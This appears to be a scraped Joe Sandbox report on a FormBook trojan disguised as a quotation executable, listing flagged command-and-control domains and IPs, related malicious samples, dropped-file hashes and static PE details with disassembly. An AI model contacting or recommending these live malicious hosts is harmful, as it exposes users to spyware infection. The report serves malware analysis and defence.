                                                                          https://ogbos88vip.clickcmdkey.exe, 00000006.00000002.292818357888.00000000047E4000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003D44000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.ecosia.org/newtab/cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://static.loopia.se/responsive/styles/reset.csscmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.google.com/favicon.icocmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://static.loopia.se/responsive/images/iOS-57.pngcmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkincmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    160.25.166.123
                                                                                    		www.rpa.asiaunknown
                                                                                    		17676GIGAINFRASoftbankBBCorpJPtrue
                                                                                    13.248.169.48
                                                                                    		www.bonheur.techUnited States
                                                                                    		16509AMAZON-02UStrue
                                                                                    103.106.67.112
                                                                                    		www.furrcali.xyzNew Zealand
                                                                                    		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                                    194.9.94.85
                                                                                    		www.milp.storeSweden
                                                                                    		39570LOOPIASEtrue
                                                                                    199.192.21.169
                                                                                    		www.bokus.siteUnited States
                                                                                    		22612NAMECHEAP-NETUStrue
                                                                                    47.83.1.90
                                                                                    		www.lejgnu.infoUnited States
                                                                                    		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                                                    172.67.132.227
                                                                                    		www.ogbos88.cyouUnited States
                                                                                    		13335CLOUDFLARENETUStrue
                                                                                    104.21.32.1
                                                                                    		www.mzkd6gp5.topUnited States
                                                                                    		13335CLOUDFLARENETUStrue
                                                                                    202.95.11.110
                                                                                    		www.mirenzhibo.netSingapore
                                                                                    		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                    136.243.64.147
                                                                                    		100millionjobs.africaGermany
                                                                                    		24940HETZNER-ASDEtrue
                                                                                    45.33.2.79
                                                                                    		www.chiro.liveUnited States
                                                                                    		63949LINODE-APLinodeLLCUStrue

                                                                                    General Information

                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                    Analysis ID:1586807
                                                                                    Start date and time:2025-01-09 16:50:18 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 16m 49s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                    Run name:Suspected Instruction Hammering
                                                                                    Number of analysed new started processes analysed:7
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Sample name:QUOTATION#050125.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@17/11
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 86%
                                                                                    • Number of executed functions: 75
                                                                                    • Number of non-executed functions: 328
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 150.171.30.10, 52.111.227.13
                                                                                    • Excluded domains from analysis (whitelisted): assets.msn.com, ctldl.windowsupdate.com, g.bing.com, nexusrules.officeapps.live.com, api.msn.com
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • VT rate limit hit for: QUOTATION#050125.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    10:54:13API Interceptor22326684x Sleep call for process: cmdkey.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    160.25.166.123QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rpa.asia/bwjl/
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rpa.asia/bwjl/
                                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rpa.asia/ggyo/
                                                                                    13.248.169.48QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.bonheur.tech/t3iv/
                                                                                    ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • www.londonatnight.coffee/13to/
                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • portlandbeauty.com/
                                                                                    profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.aktmarket.xyz/wb7v/
                                                                                    SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.xphone.net/i7vz/
                                                                                    RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                    • www.krshop.shop/5p01/
                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                    • sharewood.xyz/administrator/index.php
                                                                                    MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.snyp.shop/4nyz/
                                                                                    Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.egyshare.xyz/lp5b/
                                                                                    AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.avalanchefi.xyz/ctta/
                                                                                    103.106.67.112QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • www.furrcali.xyz/k29t/
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.furrcali.xyz/k29t/
                                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.furrcali.xyz/3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0
                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.furrcali.xyz/86f0/
                                                                                    Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • www.sailforever.xyz/p4rk/
                                                                                    Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.sailforever.xyz/hshp/
                                                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.sailforever.xyz/hshp/
                                                                                    BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.sailforever.xyz/hshp/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    www.rpa.asiaQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 160.25.166.123
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 160.25.166.123
                                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                    • 160.25.166.123
                                                                                    www.milp.storeQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 194.9.94.85
                                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    www.mirenzhibo.netQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 202.95.11.110
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 202.95.11.110
                                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                    • 202.95.11.110
                                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                    • 202.95.11.110
                                                                                    www.chiro.liveQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 198.58.118.167
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 45.33.23.183
                                                                                    www.bokus.siteQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 199.192.21.169
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 199.192.21.169
                                                                                    www.bonheur.techQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 76.223.54.146
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 13.248.169.48
                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                    • 76.223.54.146
                                                                                    www.furrcali.xyzQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    GIGAINFRASoftbankBBCorpJPQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 160.25.166.123
                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                    • 126.228.237.104
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 160.25.166.123
                                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 171.2.26.236
                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                    • 220.38.176.232
                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                    • 126.126.55.244
                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                    • 157.103.108.160
                                                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 123.230.33.166
                                                                                    arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 221.51.193.17
                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                    • 220.8.167.167
                                                                                    AMAZON-02USQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 76.223.54.146
                                                                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousXmrigBrowse
                                                                                    • 52.222.214.68
                                                                                    https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2Get hashmaliciousUnknownBrowse
                                                                                    • 18.245.60.26
                                                                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousXmrigBrowse
                                                                                    • 52.222.214.68
                                                                                    Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                    • 54.191.80.159
                                                                                    https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                                    • 65.9.66.68
                                                                                    i.elfGet hashmaliciousUnknownBrowse
                                                                                    • 54.171.230.55
                                                                                    24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                    • 18.244.18.122
                                                                                    kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                    • 18.244.18.32
                                                                                    https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                    • 65.9.66.27
                                                                                    VOYAGERNET-AS-APVoyagerInternetLtdNZQUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 202.154.140.238
                                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                    • 103.106.67.112
                                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                                    • 202.154.136.19
                                                                                    sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 202.154.140.249
                                                                                    loligang.mips-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                                    • 114.23.255.61
                                                                                    Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 103.106.67.112
                                                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 111.65.234.249

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\b427-I_1

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\cmdkey.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                                                                    Category:dropped
                                                                                    Size (bytes):229376
                                                                                    Entropy (8bit):0.9085960794285802
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                                                                    MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                                                                    SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                                                                    SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                                                                    SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\supergroups

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\QUOTATION#050125.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):288256
                                                                                    Entropy (8bit):7.993344154104057
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:mIfg0s8wpiq0iNB26Dyplf7j+g7ePgU4Pp6ZiistBSmgMOoIQ:mIfg0s8sifi664t+E3Pp6ZXUBk+
                                                                                    MD5:405A832D7C120671E90C0EB05AEDBB32
                                                                                    SHA1:87F029D955DC3C8167111761BBAB2DB878BF5DBB
                                                                                    SHA-256:1D27454FCF527F6238EE44E95F29379D73DB26E591D66250DCEAB0C9BC0379F3
                                                                                    SHA-512:704FF96D93434DA56E46C422EBDD17CFCA71FD1A6D5DC7FCE13C12E6D84BBF7EEB44DCDA9A71BEA318509357061FC663DE52EEFA40D1C52F710F7E6F0FEF9527
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...Y4H285CDY..YD.7LCES9YwH281CDYVVYDD7LCES9Y7H281CDYVVYDD7LC.S9Y9W.61.M.w.X....+, .)E'UJP.d:787+0..&e!L7.!\.u..y;9=!j:AIaS9Y7H28HBM.k6>.yW+.x3^.-...##.L..xW+._....(U.c*'1k6>.D7LCES9Yg.28}BEY<...D7LCES9Y.H09:BOYV.]DD7LCES9Yg]281SDYV&]DD7.CEC9Y7J287CDYVVYDB7LCES9Y78681ADYVVYDF7..ES)Y7X281CTYVFYDD7LCUS9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYx"<<07LC..=Y7X281.@YVFYDD7LCES9Y7H28.CD9VVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LC

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.429417446472281
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:QUOTATION#050125.exe
                                                                                    File size:1'755'136 bytes
                                                                                    MD5:b1261de24d9bcbf7395ae21722d32a37
                                                                                    SHA1:dd0d541b122ef10b820925b47ab94d76905df95c
                                                                                    SHA256:ba10f77f57b8d779c13abf725979c204d8f3b618ebd0d2f88e6c0cc7eb11c989
                                                                                    SHA512:0d79f330fab83a736ab59a51447293f898af2d0175a051b38b35d4c3528d75cd4492edc288a82197c3c2f8d7923dfd44dac411f0bd81056c9f07d24c968ee1d2
                                                                                    SSDEEP:24576:MqDEvCTbMWu7rQYlBQcBiT6rprG8aJ3X3N5uUKJThkkgDdwtaxFygI4V:MTvC/MTQYxsWR7aJH3N5uDFkkgDO/
                                                                                    TLSH:C085E1023791C022FF9B91330BA6F66597BC6E260127E51F13582DB9BE705B1163E7A3
                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                    File Icon

                                                                                    Icon Hash:333333ab693b9b98

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x420577
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x677D278F [Tue Jan 7 13:09:35 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FC378BC0C53h
                                                                                    jmp 00007FC378BC055Fh
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FC378BC073Dh
                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FC378BC070Ah
                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    and dword ptr [eax], 00000000h
                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    add eax, 04h
                                                                                    push eax
                                                                                    call 00007FC378BC32FDh
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FC378BC3348h
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FC378BC3331h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xd5c44.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1aa0000x7594.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
